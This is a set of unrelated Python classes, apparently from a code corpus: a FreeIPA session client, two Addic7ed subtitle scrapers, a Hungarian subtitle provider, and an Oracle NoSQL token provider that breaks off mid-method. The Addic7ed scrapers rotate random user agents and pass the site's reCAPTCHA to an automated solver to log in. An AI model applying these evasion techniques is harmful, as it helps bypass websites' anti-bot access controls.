class IPASession(object): # Public API def __init__(self, username, password, login=True): self.username = username self.password = password self.login_on_enter = login self.session = Session() self.session.headers = dict(IPA_HEADERS) def __enter__(self): if self.login_on_enter: self._login() return self def __exit__(self, exc_type, exc_value, exc_traceback): self.session.close() def change_own_password(self, new_password): """ Do not login first, just use an unauthenticated session for this one. >>> with IPASession(username, old_password, login=False) as session: ... session.change_own_password(new_password) """ return self._send_form( IPA_CHANGE_PASSWORD_URL, user=self.username, old_password=self.password, new_password=new_password ) def get_user_info(self, username=None): if username is None: username = self.username return self._json_rpc("user_show", username)["result"]["result"] def change_password_for_another_user(self, username, new_password): return self._json_rpc("passwd", username, new_password, IPA_OTHER_USER_PASSWORD_MAGICK) def add_user_to_group(self, username, groupname): return self._json_rpc("group_add_member", groupname, user=[username]) def remove_user_from_group(self, username, groupname): return self._json_rpc("group_remove_member", groupname, user=[username]) def create_user(self, username, first_name, surname, password): return self._json_rpc("user_add", username, givenname=first_name, sn=surname, userpassword=password) def create_group(self, group_name): try: return self._json_rpc("group_add", group_name, description=group_name) except IPAError as e: try: error, = e.args code = error["code"] except (KeyError, IndexError): # ipa connectivity error or something else, bad raise e else: if code == IPA_GROUP_ADD_ERROR_ALREADY_EXISTS: # group already exists # we are under "ensure exists" semantics so this is kosher return None else: # some other error raise e # Internal implementation def _login(self): return self._send_form(IPA_LOGIN_URL, user=self.username, password=self.password) def _send_form(self, url, **payload): response = self.session.post(url, data=payload, verify=settings.KOMPASSI_IPA_CACERT_PATH) try: response.raise_for_status() except HTTPError as e: logger.exception("IPA login failed: %s", response.content) raise IPAError(e) return True def _json_rpc(self, method_name, *args, **kwargs): headers = {"Content-Type": "application/json", "Accept": "application/json"} payload = {"params": [args, kwargs], "method": method_name, "id": 0} response = self.session.post( IPA_JSONRPC_URL, data=json.dumps(payload), headers=headers, verify=settings.KOMPASSI_IPA_CACERT_PATH ) try: response.raise_for_status() except requests.HTTPError, e: logger.exception("IPA JSON-RPC call failed: %s", response.content) raise IPAError(e) result = response.json() error = result.get("error", None) if error: raise IPAError(error) return result
class Addic7edProvider(_Addic7edProvider): languages = {Language('por', 'BR')} | {Language(l) for l in [ 'ara', 'aze', 'ben', 'bos', 'bul', 'cat', 'ces', 'dan', 'deu', 'ell', 'eng', 'eus', 'fas', 'fin', 'fra', 'glg', 'heb', 'hrv', 'hun', 'hye', 'ind', 'ita', 'jpn', 'kor', 'mkd', 'msa', 'nld', 'nor', 'pol', 'por', 'ron', 'rus', 'slk', 'slv', 'spa', 'sqi', 'srp', 'swe', 'tha', 'tur', 'ukr', 'vie', 'zho' ]} | {Language.fromietf(l) for l in ["sr-Latn", "sr-Cyrl"]} USE_ADDICTED_RANDOM_AGENTS = False hearing_impaired_verifiable = True subtitle_class = Addic7edSubtitle server_url = 'https://www.addic7ed.com/' sanitize_characters = {'-', ':', '(', ')', '.', '/'} def __init__(self, username=None, password=None, use_random_agents=False): super(Addic7edProvider, self).__init__(username=username, password=password) self.USE_ADDICTED_RANDOM_AGENTS = use_random_agents def initialize(self): self.session = Session() self.session.headers['User-Agent'] = 'Subliminal/%s' % subliminal.__short_version__ from .utils import FIRST_THOUSAND_OR_SO_USER_AGENTS as AGENT_LIST logger.debug("Addic7ed: using random user agents") self.session.headers['User-Agent'] = AGENT_LIST[randint(0, len(AGENT_LIST) - 1)] self.session.headers['Referer'] = self.server_url # login if self.username and self.password: def check_verification(cache_region): rr = self.session.get(self.server_url + 'panel.php', allow_redirects=False, timeout=10, headers={"Referer": self.server_url}) if rr.status_code == 302: logger.info('Addic7ed: Login expired') cache_region.delete("addic7ed_data") else: logger.info('Addic7ed: Re-using old login') self.logged_in = True return True if load_verification("addic7ed", self.session, callback=check_verification): return logger.info('Addic7ed: Logging in') data = {'username': self.username, 'password': self.password, 'Submit': 'Log in', 'url': '', 'remember': 'true'} tries = 0 while tries < 3: r = self.session.get(self.server_url + 'login.php', timeout=10, headers={"Referer": self.server_url}) if "grecaptcha" in r.content: logger.info('Addic7ed: Solving captcha. This might take a couple of minutes, but should only ' 'happen once every so often') site_key = re.search(r'grecaptcha.execute\(\'(.+?)\',', r.content).group(1) if not site_key: logger.error("Addic7ed: Captcha site-key not found!") return pitcher = pitchers.get_pitcher()("Addic7ed", self.server_url + 'login.php', site_key, user_agent=self.session.headers["User-Agent"], cookies=self.session.cookies.get_dict(), is_invisible=True) result = pitcher.throw() if not result: raise Exception("Addic7ed: Couldn't solve captcha!") data["recaptcha_response"] = result r = self.session.post(self.server_url + 'dologin.php', data, allow_redirects=False, timeout=10, headers={"Referer": self.server_url + "login.php"}) if "relax, slow down" in r.content: raise TooManyRequests(self.username) if r.status_code != 302: if "User <b></b> doesn't exist" in r.content and tries <= 2: logger.info("Addic7ed: Error, trying again. (%s/%s)", tries+1, 3) tries += 1 continue raise AuthenticationError(self.username) break store_verification("addic7ed", self.session) logger.debug('Addic7ed: Logged in') self.logged_in = True def terminate(self): self.session.close() def get_show_id(self, series, year=None, country_code=None): """Get the best matching show id for `series`, `year` and `country_code`. First search in the result of :meth:`_get_show_ids` and fallback on a search with :meth:`_search_show_id`. :param str series: series of the episode. :param year: year of the series, if any. :type year: int :param country_code: country code of the series, if any. :type country_code: str :return: the show id, if found. :rtype: int """ series_sanitized = sanitize(series).lower() show_ids = self._get_show_ids() show_id = None # attempt with country if not show_id and country_code: logger.debug('Getting show id with country') show_id = show_ids.get('%s %s' % (series_sanitized, country_code.lower())) # attempt with year if not show_id and year: logger.debug('Getting show id with year') show_id = show_ids.get('%s %d' % (series_sanitized, year)) # attempt clean if not show_id: logger.debug('Getting show id') show_id = show_ids.get(series_sanitized) # search as last resort # broken right now # if not show_id: # logger.warning('Series %s not found in show ids', series) # show_id = self._search_show_id(series) return show_id @region.cache_on_arguments(expiration_time=SHOW_EXPIRATION_TIME) def _get_show_ids(self): """Get the ``dict`` of show ids per series by querying the `shows.php` page. :return: show id per series, lower case and without quotes. :rtype: dict # patch: add punctuation cleaning """ # get the show page logger.info('Getting show ids') r = self.session.get(self.server_url + 'shows.php', timeout=10) r.raise_for_status() # LXML parser seems to fail when parsing Addic7ed.com HTML markup. # Last known version to work properly is 3.6.4 (next version, 3.7.0, fails) # Assuming the site's markup is bad, and stripping it down to only contain what's needed. show_cells = re.findall(show_cells_re, r.content) if show_cells: soup = ParserBeautifulSoup(b''.join(show_cells), ['lxml', 'html.parser']) else: # If RegEx fails, fall back to original r.content and use 'html.parser' soup = ParserBeautifulSoup(r.content, ['html.parser']) # populate the show ids show_ids = {} for show in soup.select('td > h3 > a[href^="/show/"]'): show_clean = sanitize(show.text, default_characters=self.sanitize_characters) try: show_id = int(show['href'][6:]) except ValueError: continue show_ids[show_clean] = show_id match = series_year_re.match(show_clean) if match and match.group(2) and match.group(1) not in show_ids: # year found, also add it without year show_ids[match.group(1)] = show_id soup.decompose() soup = None logger.debug('Found %d show ids', len(show_ids)) return show_ids @region.cache_on_arguments(expiration_time=SHOW_EXPIRATION_TIME) def _search_show_id(self, series, year=None): """Search the show id from the `series` and `year`. :param str series: series of the episode. :param year: year of the series, if any. :type year: int :return: the show id, if found. :rtype: int """ # addic7ed doesn't support search with quotes series = series.replace('\'', ' ') # build the params series_year = '%s %d' % (series, year) if year is not None else series params = {'search': series_year, 'Submit': 'Search'} # make the search logger.info('Searching show ids with %r', params) # currently addic7ed searches via srch.php from the front page, then a re-search is needed which calls # search.php for endpoint in ("srch.php", "search.php",): headers = None if endpoint == "search.php": headers = { "referer": self.server_url + "srch.php" } r = self.session.get(self.server_url + endpoint, params=params, timeout=10, headers=headers) r.raise_for_status() if r.content and "Sorry, your search" not in r.content: break time.sleep(4) if r.status_code == 304: raise TooManyRequests() soup = ParserBeautifulSoup(r.content, ['lxml', 'html.parser']) suggestion = None # get the suggestion try: suggestion = soup.select('span.titulo > a[href^="/show/"]') if not suggestion: logger.warning('Show id not found: no suggestion') return None if not sanitize(suggestion[0].i.text.replace('\'', ' '), default_characters=self.sanitize_characters) == \ sanitize(series_year, default_characters=self.sanitize_characters): logger.warning('Show id not found: suggestion does not match') return None show_id = int(suggestion[0]['href'][6:]) logger.debug('Found show id %d', show_id) return show_id finally: soup.decompose() soup = None def query(self, show_id, series, season, year=None, country=None): # patch: fix logging # get the page of the season of the show logger.info('Getting the page of show id %d, season %d', show_id, season) r = self.session.get(self.server_url + 'ajax_loadShow.php', params={'show': show_id, 'season': season}, timeout=10, headers={ "referer": "%sshow/%s" % (self.server_url, show_id), "X-Requested-With": "XMLHttpRequest" } ) r.raise_for_status() if r.status_code == 304: raise TooManyRequests() if not r.content: # Provider wrongful return a status of 304 Not Modified with an empty content # raise_for_status won't raise exception for that status code logger.error('No data returned from provider') return [] soup = ParserBeautifulSoup(r.content, ['lxml', 'html.parser']) # loop over subtitle rows subtitles = [] for row in soup.select('tr.epeven'): cells = row('td') # ignore incomplete subtitles status = cells[5].text if status != 'Completed': logger.debug('Ignoring subtitle with status %s', status) continue # read the item language = Language.fromaddic7ed(cells[3].text) hearing_impaired = bool(cells[6].text) page_link = self.server_url + cells[2].a['href'][1:] season = int(cells[0].text) episode = int(cells[1].text) title = cells[2].text version = cells[4].text download_link = cells[9].a['href'][1:] subtitle = self.subtitle_class(language, hearing_impaired, page_link, series, season, episode, title, year, version, download_link) logger.debug('Found subtitle %r', subtitle) subtitles.append(subtitle) soup.decompose() soup = None return subtitles def download_subtitle(self, subtitle): # download the subtitle r = self.session.get(self.server_url + subtitle.download_link, headers={'Referer': subtitle.page_link}, timeout=10) r.raise_for_status() if r.status_code == 304: raise TooManyRequests() if not r.content: # Provider wrongful return a status of 304 Not Modified with an empty content # raise_for_status won't raise exception for that status code logger.error('Unable to download subtitle. No data returned from provider') return # detect download limit exceeded if r.headers['Content-Type'] == 'text/html': raise DownloadLimitExceeded subtitle.content = fix_line_ending(r.content)
class Addic7edProvider(_Addic7edProvider): languages = {Language('por', 'BR')} | { Language(l) for l in [ 'ara', 'aze', 'ben', 'bos', 'bul', 'cat', 'ces', 'dan', 'deu', 'ell', 'eng', 'eus', 'fas', 'fin', 'fra', 'glg', 'heb', 'hrv', 'hun', 'hye', 'ind', 'ita', 'jpn', 'kor', 'mkd', 'msa', 'nld', 'nor', 'pol', 'por', 'ron', 'rus', 'slk', 'slv', 'spa', 'sqi', 'srp', 'swe', 'tha', 'tur', 'ukr', 'vie', 'zho' ] } | {Language.fromietf(l) for l in ["sr-Latn", "sr-Cyrl"]} USE_ADDICTED_RANDOM_AGENTS = False hearing_impaired_verifiable = True subtitle_class = Addic7edSubtitle server_url = 'https://www.addic7ed.com/' sanitize_characters = {'-', ':', '(', ')', '.', '/'} last_show_ids_fetch_key = "addic7ed_last_id_fetch" def __init__(self, username=None, password=None, use_random_agents=False): super(Addic7edProvider, self).__init__(username=username, password=password) self.USE_ADDICTED_RANDOM_AGENTS = use_random_agents if not all((username, password)): raise ConfigurationError('Username and password must be specified') def initialize(self): self.session = Session() self.session.headers[ 'User-Agent'] = 'Subliminal/%s' % subliminal.__short_version__ from .utils import FIRST_THOUSAND_OR_SO_USER_AGENTS as AGENT_LIST logger.debug("Addic7ed: using random user agents") self.session.headers['User-Agent'] = AGENT_LIST[randint( 0, len(AGENT_LIST) - 1)] self.session.headers['Referer'] = self.server_url # login if self.username and self.password: def check_verification(cache_region): try: rr = self.session.get(self.server_url + 'panel.php', allow_redirects=False, timeout=10, headers={"Referer": self.server_url}) if rr.status_code == 302: logger.info('Addic7ed: Login expired') cache_region.delete("addic7ed_data") else: logger.info('Addic7ed: Re-using old login') self.logged_in = True return True except (ConnectionError, ConnectTimeout) as e: logger.debug( "Addic7ed: There was a problem reaching the server: %s." % e) raise IPAddressBlocked( "Addic7ed: Your IP is temporarily blocked.") if load_verification("addic7ed", self.session, callback=check_verification): return logger.info('Addic7ed: Logging in') data = { 'username': self.username, 'password': self.password, 'Submit': 'Log in', 'url': '', 'remember': 'true' } tries = 0 while tries <= 3: tries += 1 r = self.session.get(self.server_url + 'login.php', timeout=10, headers={"Referer": self.server_url}) if "g-recaptcha" in r.text or "grecaptcha" in r.text: logger.info( 'Addic7ed: Solving captcha. This might take a couple of minutes, but should only ' 'happen once every so often') for g, s in (("g-recaptcha-response", r'g-recaptcha.+?data-sitekey=\"(.+?)\"'), ("recaptcha_response", r'grecaptcha.execute\(\'(.+?)\',')): site_key = re.search(s, r.text).group(1) if site_key: break if not site_key: logger.error("Addic7ed: Captcha site-key not found!") return pitcher = pitchers.get_pitcher()( "Addic7ed", self.server_url + 'login.php', site_key, user_agent=self.session.headers["User-Agent"], cookies=self.session.cookies.get_dict(), is_invisible=True) result = pitcher.throw() if not result: if tries >= 3: raise Exception( "Addic7ed: Couldn't solve captcha!") logger.info( "Addic7ed: Couldn't solve captcha! Retrying") continue data[g] = result r = self.session.post( self.server_url + 'dologin.php', data, allow_redirects=False, timeout=10, headers={"Referer": self.server_url + "login.php"}) if "relax, slow down" in r.text: raise TooManyRequests(self.username) if "Wrong password" in r.text or "doesn't exist" in r.text: raise AuthenticationError(self.username) if r.status_code != 302: if tries >= 3: logger.error( "Addic7ed: Something went wrong when logging in") raise AuthenticationError(self.username) logger.info( "Addic7ed: Something went wrong when logging in; retrying" ) continue break store_verification("addic7ed", self.session) logger.debug('Addic7ed: Logged in') self.logged_in = True def terminate(self): self.session.close() def get_show_id(self, series, year=None, country_code=None, ignore_cache=False): """Get the best matching show id for `series`, `year` and `country_code`. First search in the result of :meth:`_get_show_ids` and fallback on a search with :meth:`_search_show_id`. :param str series: series of the episode. :param year: year of the series, if any. :type year: int :param country_code: country code of the series, if any. :type country_code: str :return: the show id, if found. :rtype: int """ show_id = None ids_to_look_for = { sanitize(series).lower(), sanitize(series.replace(".", "")).lower(), sanitize(series.replace("&", "and")).lower() } show_ids = self._get_show_ids() if ignore_cache or not show_ids: show_ids = self._get_show_ids.refresh(self) logger.debug("Trying show ids: %s", ids_to_look_for) for series_sanitized in ids_to_look_for: # attempt with country if not show_id and country_code: logger.debug('Getting show id with country') show_id = show_ids.get( '%s %s' % (series_sanitized, country_code.lower())) # attempt with year if not show_id and year: logger.debug('Getting show id with year') show_id = show_ids.get('%s %d' % (series_sanitized, year)) # attempt clean if not show_id: logger.debug('Getting show id') show_id = show_ids.get(series_sanitized) if not show_id: now = datetime.datetime.now() last_fetch = region.get(self.last_show_ids_fetch_key) # re-fetch show ids once per day if any show ID not found if not ignore_cache and last_fetch != NO_VALUE and last_fetch + datetime.timedelta( days=1) < now: logger.info("Show id not found; re-fetching show ids") return self.get_show_id(series, year=year, country_code=country_code, ignore_cache=True) logger.debug( "Not refreshing show ids, as the last fetch has been too recent" ) # search as last resort # broken right now # if not show_id: # logger.warning('Series %s not found in show ids', series) # show_id = self._search_show_id(series) return show_id @region.cache_on_arguments(expiration_time=SHOW_EXPIRATION_TIME) def _get_show_ids(self): """Get the ``dict`` of show ids per series by querying the `shows.php` page. :return: show id per series, lower case and without quotes. :rtype: dict # patch: add punctuation cleaning """ # get the show page logger.info('Getting show ids') region.set(self.last_show_ids_fetch_key, datetime.datetime.now()) r = self.session.get(self.server_url + 'shows.php', timeout=10) r.raise_for_status() # LXML parser seems to fail when parsing Addic7ed.com HTML markup. # Last known version to work properly is 3.6.4 (next version, 3.7.0, fails) # Assuming the site's markup is bad, and stripping it down to only contain what's needed. show_cells = re.findall(show_cells_re, r.content) if show_cells: soup = ParserBeautifulSoup( b''.join(show_cells).decode('utf-8', 'ignore'), ['lxml', 'html.parser']) else: # If RegEx fails, fall back to original r.text and use 'html.parser' soup = ParserBeautifulSoup(r.text, ['html.parser']) # populate the show ids show_ids = {} shows = soup.select('td > h3 > a[href^="/show/"]') for show in shows: show_clean = sanitize(show.text, default_characters=self.sanitize_characters) try: show_id = int(show['href'][6:]) except ValueError: continue show_ids[show_clean] = show_id match = series_year_re.match(show_clean) if match and match.group(2) and match.group(1) not in show_ids: # year found, also add it without year show_ids[match.group(1)] = show_id soup.decompose() soup = None logger.debug('Found %d show ids', len(show_ids)) if not show_ids: raise Exception("Addic7ed: No show IDs found!") return show_ids @region.cache_on_arguments(expiration_time=SHOW_EXPIRATION_TIME) def _search_show_id(self, series, year=None): """Search the show id from the `series` and `year`. :param str series: series of the episode. :param year: year of the series, if any. :type year: int :return: the show id, if found. :rtype: int """ # addic7ed doesn't support search with quotes series = series.replace('\'', ' ') # build the params series_year = '%s %d' % (series, year) if year is not None else series params = {'search': series_year, 'Submit': 'Search'} # make the search logger.info('Searching show ids with %r', params) # currently addic7ed searches via srch.php from the front page, then a re-search is needed which calls # search.php for endpoint in ( "srch.php", "search.php", ): headers = None if endpoint == "search.php": headers = {"referer": self.server_url + "srch.php"} r = self.session.get(self.server_url + endpoint, params=params, timeout=10, headers=headers) r.raise_for_status() if r.text and "Sorry, your search" not in r.text: break time.sleep(4) if r.status_code == 304: raise TooManyRequests() soup = ParserBeautifulSoup(r.text, ['lxml', 'html.parser']) suggestion = None # get the suggestion try: suggestion = soup.select('span.titulo > a[href^="/show/"]') if not suggestion: logger.warning('Show id not found: no suggestion') return None if not sanitize(suggestion[0].i.text.replace('\'', ' '), default_characters=self.sanitize_characters) == \ sanitize(series_year, default_characters=self.sanitize_characters): logger.warning('Show id not found: suggestion does not match') return None show_id = int(suggestion[0]['href'][6:]) logger.debug('Found show id %d', show_id) return show_id finally: soup.decompose() soup = None def query(self, show_id, series, season, year=None, country=None): # patch: fix logging # get the page of the season of the show logger.info('Getting the page of show id %d, season %d', show_id, season) r = self.session.get(self.server_url + 'ajax_loadShow.php', params={ 'show': show_id, 'season': season }, timeout=10, headers={ "referer": "%sshow/%s" % (self.server_url, show_id), "X-Requested-With": "XMLHttpRequest" }) r.raise_for_status() if r.status_code == 304: raise TooManyRequests() if not r.text: # Provider wrongful return a status of 304 Not Modified with an empty content # raise_for_status won't raise exception for that status code logger.error('No data returned from provider') return [] soup = ParserBeautifulSoup(r.text, ['lxml', 'html.parser']) # loop over subtitle rows subtitles = [] for row in soup.select('tr.epeven'): cells = row('td') # ignore incomplete subtitles status = cells[5].text if "%" in status: logger.debug('Ignoring subtitle with status %s', status) continue # read the item language = Language.fromaddic7ed(cells[3].text) hearing_impaired = bool(cells[6].text) page_link = self.server_url + cells[2].a['href'][1:] season = int(cells[0].text) episode = int(cells[1].text) title = cells[2].text version = cells[4].text download_link = cells[9].a['href'][1:] subtitle = self.subtitle_class(language, hearing_impaired, page_link, series, season, episode, title, year, version, download_link) logger.debug('Found subtitle %r', subtitle) subtitles.append(subtitle) soup.decompose() soup = None return subtitles def download_subtitle(self, subtitle): # download the subtitle r = self.session.get(self.server_url + subtitle.download_link, headers={'Referer': subtitle.page_link}, timeout=10) r.raise_for_status() if r.status_code == 304: raise TooManyRequests() if not r.text: # Provider wrongful return a status of 304 Not Modified with an empty content # raise_for_status won't raise exception for that status code logger.error( 'Unable to download subtitle. No data returned from provider') return # detect download limit exceeded if r.headers['Content-Type'] == 'text/html': raise DownloadLimitExceeded subtitle.content = fix_line_ending(r.content)
class SuperSubtitlesProvider(Provider, ProviderSubtitleArchiveMixin): """SuperSubtitles Provider.""" languages = {Language('hun', 'HU')} | {Language(l) for l in ['hun', 'eng']} video_types = (Episode, Movie) # https://www.feliratok.info/?search=&soriSorszam=&nyelv=&sorozatnev=The+Flash+%282014%29&sid=3212&complexsearch=true&knyelv=0&evad=4&epizod1=1&cimke=0&minoseg=0&rlsr=0&tab=all server_url = 'https://www.feliratok.info/' subtitle_class = SuperSubtitlesSubtitle hearing_impaired_verifiable = False multi_result_throttle = 2 # seconds def initialize(self): self.session = Session() self.session.headers = { 'User-Agent': os.environ.get("SZ_USER_AGENT", "Sub-Zero/2") } def terminate(self): self.session.close() def get_language(self, text): if text == 'Magyar': return Language.fromsupersubtitles('hu') if text == 'Angol': return Language.fromsupersubtitles('en') return None def find_imdb_id(self, sub_id): """ """ url = self.server_url + "index.php?tipus=adatlap&azon=a_" + sub_id # url = https://www.feliratok.info/index.php?tipus=adatlap&azon=a_1518600916 logger.info('Get IMDB id from URL %s', url) r = self.session.get(url, timeout=10).content soup = ParserBeautifulSoup(r, ['lxml']) links = soup.find_all("a") for value in links: if "imdb.com" in str(value): # <a alt="iMDB" href="http://www.imdb.com/title/tt2357547/" target="_blank"><img alt="iMDB" src="img/adatlap/imdb.png"/></a> imdb_id = re.findall(r'(?<=www\.imdb\.com/title/).*(?=/")', str(value))[0] return imdb_id return None def find_id(self, series, year, original_title): """ We need to find the id of the series at the following url: https://www.feliratok.info/index.php?term=SERIESNAME&nyelv=0&action=autoname Where SERIESNAME is a searchable string. The result will be something like this: [{"name":"DC\u2019s Legends of Tomorrow (2016)","ID":"3725"},{"name":"Miles from Tomorrowland (2015)","ID":"3789"} ,{"name":"No Tomorrow (2016)","ID":"4179"}] """ # Search for exact name url = self.server_url + "index.php?term=" + series + "&nyelv=0&action=autoname" # url = self.server_url + "index.php?term=" + "fla"+ "&nyelv=0&action=autoname" logger.info('Get series id from URL %s', url) r = self.session.get(url, timeout=10) # r is something like this: # [{"name":"DC\u2019s Legends of Tomorrow (2016)","ID":"3725"},{"name":"Miles from Tomorrowland (2015)","ID":"3789"} # ,{"name":"No Tomorrow (2016)","ID":"4179"}] results = r.json() # check all of the results: for result in results: try: # "name":"Miles from Tomorrowland (2015)","ID":"3789" result_year = re.findall(r"(?<=\()\d\d\d\d(?=\))", result['name'])[0] except IndexError: result_year = "" try: # "name":"Miles from Tomorrowland (2015)","ID":"3789" result_title = re.findall(r".*(?=\(\d\d\d\d\))", result['name'])[0] result_id = result['ID'] except IndexError: continue result_title = result_title.strip().replace("�", "").replace(" ", ".") guessable = result_title.strip() + ".s01e01." + result_year guess = guessit(guessable, {'type': "episode"}) if sanitize(original_title) == sanitize( guess['title'] ) and year and guess['year'] and year == guess['year']: # Return the founded id return result_id return None def query(self, series, video=None): year = video.year subtitle = None if isinstance(video, Episode): series = video.series season = video.season episode = video.episode #seriesa = series.replace(' ', '+') # Get ID of series with original name series_id = self.find_id(series, year, series) if not series_id: # If not founded try without ' char modified_series = series.replace(' ', '+').replace('\'', '') series_id = self.find_id(modified_series, year, series) if not series_id and modified_series: # If still not founded try with the longest word is series title modified_series = modified_series.split('+') modified_series = max(modified_series, key=len) series_id = self.find_id(modified_series, year, series) if not series_id: return None # https://www.feliratok.info/index.php?search=&soriSorszam=&nyelv=&sorozatnev=&sid=2075&complexsearch=true&knyelv=0&evad=6&epizod1=16&cimke=0&minoseg=0&rlsr=0&tab=all url = self.server_url + "index.php?search=&soriSorszam=&nyelv=&sorozatnev=&sid=" + \ str(series_id) + "&complexsearch=true&knyelv=0&evad=" + str(season) + "&epizod1=" + str( episode) + "&cimke=0&minoseg=0&rlsr=0&tab=all" subtitle = self.process_subs(series, video, url) if not subtitle: # No Subtitle found. Maybe already archived to season pack url = self.server_url + "index.php?search=&soriSorszam=&nyelv=&sorozatnev=&sid=" + \ str(series_id) + "&complexsearch=true&knyelv=0&evad=" + str( season) + "&epizod1=&evadpakk=on&cimke=0&minoseg=0&rlsr=0&tab=all" subtitle = self.process_subs(series, video, url) if isinstance(video, Movie): title = series.replace(" ", "+") # https://www.feliratok.info/index.php?search=The+Hitman%27s+BodyGuard&soriSorszam=&nyelv=&tab=film url = self.server_url + "index.php?search=" + title + "&soriSorszam=&nyelv=&tab=film" subtitle = self.process_subs(series, video, url) return subtitle def process_subs(self, series, video, url): subtitles = [] logger.info('URL for subtitles %s', url) r = self.session.get(url, timeout=10).content soup = ParserBeautifulSoup(r, ['lxml']) tables = soup.find_all("table") tables = tables[0].find_all("tr") i = 0 series_imdb_id = None for table in tables: if "vilagit" in str(table) and i > 1: try: sub_hun_name = table.findAll("div", {"class": "magyar"})[0] if isinstance(video, Episode): if "vad)" not in str(sub_hun_name): # <div class="magyar">A pletykaf�szek (3. �vad)</div> sub_hun_name = re.findall( r'(?<=<div class="magyar">).*(?= -)', str(sub_hun_name))[0] else: # <div class="magyar">A holnap legend�i - 3x11</div> sub_hun_name = re.findall( r'(?<=<div class="magyar">).*(?= \()', str(sub_hun_name))[0] if isinstance(video, Movie): sub_hun_name = re.findall( r'(?<=<div class="magyar">).*(?=</div)', str(sub_hun_name))[0] except IndexError: sub_hun_name = "" asked_for_episode = None sub_season = None sub_episode = None sub_english = table.findAll("div", {"class": "eredeti"}) if isinstance(video, Episode): asked_for_episode = video.episode if "Season" not in str(sub_english): # [<div class="eredeti">Gossip Girl (Season 3) (DVDRip-REWARD)</div>] sub_english_name = re.findall( r'(?<=<div class="eredeti">).*?(?= -)', str(sub_english))[0] sub_season = int((re.findall( r"(?<=- ).*?(?= - )", str(sub_english))[0].split('x')[0]).strip()) sub_episode = int((re.findall( r"(?<=- ).*?(?= - )", str(sub_english))[0].split('x')[1]).strip()) else: # [<div class="eredeti">DC's Legends of Tomorrow - 3x11 - Here I Go Again (HDTV-AFG, HDTV-RMX, 720p-SVA, 720p-PSA </div>] sub_english_name = \ re.findall(r'(?<=<div class="eredeti">).*?(?=\(Season)', str(sub_english))[0] sub_season = int( re.findall(r"(?<=Season )\d+(?=\))", str(sub_english))[0]) sub_episode = int(video.episode) if isinstance(video, Movie): sub_english_name = re.findall( r'(?<=<div class="eredeti">).*?(?=\()', str(sub_english))[0] sub_version = (str(sub_english).split('(')[ len(str(sub_english).split('(')) - 1]).split(')')[0] # <small>Angol</small> lang = table.findAll("small")[0] sub_language = self.get_language( re.findall(r"(?<=<small>).*(?=</small>)", str(lang))[0]) # <a href="/index.php?action=letolt&fnev=DCs Legends of Tomorrow - 03x11 - Here I Go Again.SVA.English.C.orig.Addic7ed.com.srt&felirat=1519162191"> link = str(table.findAll("a")[len(table.findAll("a")) - 1]).replace("amp;", "") sub_downloadlink = self.server_url + re.findall( r'(?<=href="/).*(?=">)', link)[0] sub_id = re.findall(r"(?<=felirat\=).*(?=\"\>)", link)[0] sub_year = video.year sub_releases = [s.strip() for s in sub_version.split(',')] # For episodes we open the series page so all subtitles imdb_id must be the same. no need to check all if isinstance(video, Episode) and series_imdb_id is not None: sub_imdb_id = series_imdb_id else: sub_imdb_id = self.find_imdb_id(sub_id) series_imdb_id = sub_imdb_id subtitle = SuperSubtitlesSubtitle( sub_language, sub_downloadlink, sub_id, sub_english_name.strip(), sub_season, sub_episode, sub_version, sub_releases, sub_year, sub_imdb_id, asked_for_episode, asked_for_release_group=video.release_group) subtitles.append(subtitle) i = i + 1 return subtitles def list_subtitles(self, video, languages): if isinstance(video, Episode): titles = [video.series] + video.alternative_series elif isinstance(video, Movie): titles = [video.title] + video.alternative_titles for title in titles: subs = self.query(title, video=video) if subs: return subs time.sleep(self.multi_result_throttle) return [] def download_subtitle(self, subtitle): # download as a zip logger.info('Downloading subtitle %r', subtitle.subtitle_id) r = self.session.get(subtitle.page_link, timeout=10) r.raise_for_status() if ".rar" in subtitle.page_link: logger.debug('Archive identified as rar') archive_stream = io.BytesIO(r.content) archive = RarFile(archive_stream) subtitle.content = self.get_subtitle_from_archive( subtitle, archive) elif ".zip" in subtitle.page_link: logger.debug('Archive identified as zip') archive_stream = io.BytesIO(r.content) archive = ZipFile(archive_stream) subtitle.content = self.get_subtitle_from_archive( subtitle, archive) else: subtitle.content = fix_line_ending(r.content)
class StoreAccessTokenProvider(AuthorizationProvider): """ On-premise only. StoreAccessTokenProvider is an :py:class:`borneo.AuthorizationProvider` that performs the following functions: Initial (bootstrap) login to store, using credentials provided.\n Storage of bootstrap login token for re-use.\n Optionally renews the login token before it expires.\n Logs out of the store when closed. If accessing an insecure instance of Oracle NoSQL Database the default constructor is used, with no arguments. If accessing a secure instance of Oracle NoSQL Database a user name and password must be provided. That user must already exist in the NoSQL Database and have sufficient permission to perform table operations. That user's identity is used to authorize all database operations. To access to a store without security enabled, no parameter need to be set to the constructor. To access to a secure store, the constructor requires a valid user name and password to access the target store. The user must exist and have sufficient permission to perform table operations required by the application. The user identity is used to authorize all operations performed by the application. :param user_name: the user name to use for the store. This user must exist in the NoSQL Database and is the identity that is used for authorizing all database operations. :type user_name: str :param password: the password for the user. :type password: str :raises IllegalArgumentException: raises the exception if one or more of the parameters is malformed or a required parameter is missing. """ # Used when we send user:password pair. _BASIC_PREFIX = 'Basic ' # The general prefix for the login token. _BEARER_PREFIX = 'Bearer ' # Login service end point name. _LOGIN_SERVICE = '/login' # Login token renew service end point name. _RENEW_SERVICE = '/renew' # Logout service end point name. _LOGOUT_SERVICE = '/logout' # Default timeout when sending http request to server _HTTP_TIMEOUT_MS = 30000 def __init__(self, user_name=None, password=None): self._endpoint = None self._url = None self._auth_string = None self._auto_renew = True self._is_closed = False # The base path for security related services. self._base_path = HttpConstants.KV_SECURITY_PATH # The login token expiration time. self._expiration_time = 0 self._logger = None self._logutils = LogUtils(self._logger) self._sess = Session() self._request_utils = borneo.http.RequestUtils(self._sess, self._logutils) self._lock = Lock() self._timer = None self.lock = Lock() if user_name is None and password is None: # Used to access to a store without security enabled. self._is_secure = False else: if user_name is None or password is None: raise IllegalArgumentException('Invalid input arguments.') CheckValue.check_str(user_name, 'user_name') CheckValue.check_str(password, 'password') self._is_secure = True self._user_name = user_name self._password = password @synchronized def bootstrap_login(self): # Bootstrap login using the provided credentials. if not self._is_secure or self._is_closed: return # Convert the username:password pair in base 64 format. pair = self._user_name + ':' + self._password try: encoded_pair = b64encode(pair) except TypeError: encoded_pair = b64encode(pair.encode()).decode() try: # Send request to server for login token. response = self._send_request( StoreAccessTokenProvider._BASIC_PREFIX + encoded_pair, StoreAccessTokenProvider._LOGIN_SERVICE) content = response.get_content() # Login fail if response.get_status_code() != codes.ok: raise InvalidAuthorizationException( 'Fail to login to service: ' + content) if self._is_closed: return # Generate the authentication string using login token. self._auth_string = 